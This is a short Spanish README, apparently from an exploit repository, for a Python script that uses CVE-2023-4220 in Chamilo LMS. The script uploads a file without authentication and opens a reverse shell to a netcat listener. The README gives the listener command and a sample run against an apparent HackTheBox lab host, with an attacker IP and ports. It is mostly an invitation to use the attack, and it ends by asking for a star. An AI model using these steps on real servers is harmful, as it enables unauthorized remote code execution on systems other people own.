
Exploit en Python para CVE-2023-4220 en Chamilo LMS que sube un archivo y entrega una reverse shell no autenticada a un listener de netcat.
pip install requests
El script de python utiliza la vulnerabilidad CVE-2023-422 para subir un archivo al servidor y usa ese archivo para enviar una reverse shell al listener de netcat y todo esto se puede hacer sin estar autenticado. Sin embargo, deberás seguir los siguientes pasos para usar con éxito el script de python.
Iniciar el listener de netcat:
nc -lnvp 4444
Ejecutar el script de Python (Ejemplo):
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
Por favor, deja una estrella si el siguiente exploit te resultó útil :)